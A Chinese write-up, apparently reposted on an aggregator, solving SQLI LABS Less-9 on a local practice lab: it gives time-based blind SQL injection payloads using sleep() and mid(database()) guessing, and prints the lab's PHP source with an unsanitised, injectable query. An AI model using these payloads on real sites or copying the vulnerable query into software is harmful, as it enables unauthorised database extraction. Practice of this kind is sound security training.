当前位置：首页 > news >正文

SQLI LABS | Less-9 GET-Blind-Time based-Single Quotes

news 2025/12/16 1:07:37

关注这个靶场的其它相关笔记：SQLI LABS —— 靶场笔记合集-CSDN博客

0x01：过关流程

输入下面的链接进入靶场（如果你的地址和我不一样，按照你本地的环境来）：

 http://localhost/sqli-labs/Less-9/

靶场提示 Please input the ID as parameter with numeric value 要我们输入一个数字型的 ID 作为参数进行查询，那我们就按它的意思传入 id 看看网页返回的结果：

可以看到，服务器返回了 You are in...........，似乎是认可了我们的操作，但是我们并没有获得什么有效的信息。此时，我们可以再输入几个数据进行测试：

 测试 Payload 01: ?id=1   # 结果: You are in...........测试 Payload 02: ?id=2   # 结果: You are in...........测试 Payload 03: ?id=2-1 # 结果: You are in...........测试 Payload 04: ?id=1'  # 结果: You are in...........测试 Payload 05: ?id=1"  # 结果: You are in...........

如上，我们一共测试了 5 个 Payload，后端返回的一直都是 You are in...........，此时我们需要分析一下了。后端常用的 SQL 注入模板中闭合符号一般是 ' 与 "，只要我们的 Payload 能够逃逸出这两种符号，后端返回的内容多少都会有些异常的。但是从上面的五组 Payload 来看，后端返回的都是一样的数据。如此，会有两种情况：

目标后端过滤的很好，我们测试的 Payload 都没有成功逃逸出目标的过滤。
目标后端过滤的不好，它执行了我们传递给它的参数，但是它通过回显欺骗了我们。

这里笔者更倾向第二种，毕竟要是第一种的话，就测不下去啦。面对这种回显都一样的情况，我们可以采用时间盲注，下面是测试的 Payload（时间盲注的 Payload 需要完美闭合才有用哦）：

 测试 Payload 01: ?id=1 and sleep(5) --+    # 响应时间: 11ms测试 Payload 02: ?id=1' and sleep(5) --+'  # 响应时间: 5.04s

可以看到，当我们传递 Payload 02 给服务器后端时，服务器的响应时间明显不正常。根据我们测试的 Payload，我们可以推测出目标后端的 SQL 模板如下：

 select username,password from users where id='$_GET["id"]' LIMIT 0,1;

根据上面的 SQL 模板，我们可以构造如下 Payload 对目标发起攻击（使用[[0x0304B：SQL 注入 —— 时间盲注|时间盲注]]）：

 -- 获取当前服务器正在使用的数据库的名称的长度攻击 Payload: ?id=1' and sleep(if(length(database())=1,5,0)) --+'笔者备注: 当响应时间 >= 5s 时，证明猜测正确，否则猜测错误-- 以下是攻击成功的 Payload 的示例Payload - 猜测目标数据库名长度: ?id=1' and sleep(if(length(database())=8,5,0)) --+'Payload - 获取数据库第一个字符: ?id=1' and sleep(if(mid(database(),1,1)='s',5,0)) --+'Payload - 获取数据库第二个字符: ?id=1' and sleep(if(mid(database(),2,1)='e',5,0)) --+'....

可以看到，我们已经成功获取了当前站点使用的后端数据库的信息。至此，Less-9 GET-Blind-Time based-Single Quotes 成功过关。

0x02：源码分析

下面是 SQLI LABS Less-9 GET-Blind-Time based-Single Quotes 后端的部分源码，以及笔者做的笔记：

<?php//including the Mysql connect parameters.include("../sql-connections/sqli-connect.php");     // 获取数据库连接函数error_reporting(0);// take the variablesif (isset($_GET['id'])) {$id = $_GET['id'];//logging the connection parameters to a file for analysis.$fp = fopen('result.txt', 'a');fwrite($fp, 'ID:' . $id . "\n");fclose($fp);// connectivity $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // 服务器后端实际执行的 SQL 语句，因为没有过滤，虽然无回显，但通过时间盲注还是能发现$result = mysqli_query($con1, $sql);$row = mysqli_fetch_array($result, MYSQLI_BOTH);if ($row) {     // 如果查询到结果，输出 You are in .....echo '<font size="5" color="#FFFF00">';echo 'You are in...........';echo "<br>";echo "</font>";} else {        // 如果没有查询到结果，也输出 You are in .......echo '<font size="5" color="#FFFF00">';echo 'You are in...........';//print_r(mysqli_error($con1));//echo "You have an error in your SQL syntax";echo "</br></font>";echo '<font color= "#0000ff" font size= 3>';}} else {echo "Please input the ID as parameter with numeric value";}?>

SQLI LABS | Less-9 GET-Blind-Time based-Single Quotes

0x01：过关流程

0x02：源码分析

相关文章：

SQLI LABS | Less-9 GET-Blind-Time based-Single Quotes

【小白学机器学习24】用例子来比较：无偏估计和有偏估计

C++在实际项目中的应用第二节：C++与网络编程

依赖关系是危险的

ipguard与Ping32如何加密数据防止泄露？让企业信息更安全

gitlab 的备份与回复

创建型模式-----建造者模式

威胁 Windows 和 Linux 系统的新型跨平台勒索软件：Cicada3301

Go 语言基础教程：7.Switch 语句

mysql原理、部署mysql主从+读写分离、监控mysql主从脚本

模型选择拟合

文案语音图片视频管理分析系统-视频矩阵

ArcGIS计算落入面图层中的线的长度或面的面积

ctfshow-web入门-web172

Keep健身TV版 3.3.0 | 针对智能电视的健身塑形软件

推荐一些关于计算机网络和 TCP/IP 协议的书籍

生成式AI浪潮下的商业机遇与经济展望 —— 与互联网时代的比较

Go 标准库

AUTOSAR_EXP_ARAComAPI的6章笔记（5）

Photoshop中的混合模式公式详解

19c补丁后oracle属主变化，导致不能识别磁盘组

XCTF-web-easyupload

Linux 文件类型，目录与路径，文件与目录管理

基于距离变化能量开销动态调整的WSN低功耗拓扑控制开销算法matlab仿真

前端倒计时误差!

在四层代理中还原真实客户端ngx_stream_realip_module

React19源码系列之事件插件系统

CocosCreator 之 JavaScript/TypeScript和Java的相互交互

从零实现STL哈希容器：unordered_map/unordered_set封装详解

DBAPI如何优雅的获取单条数据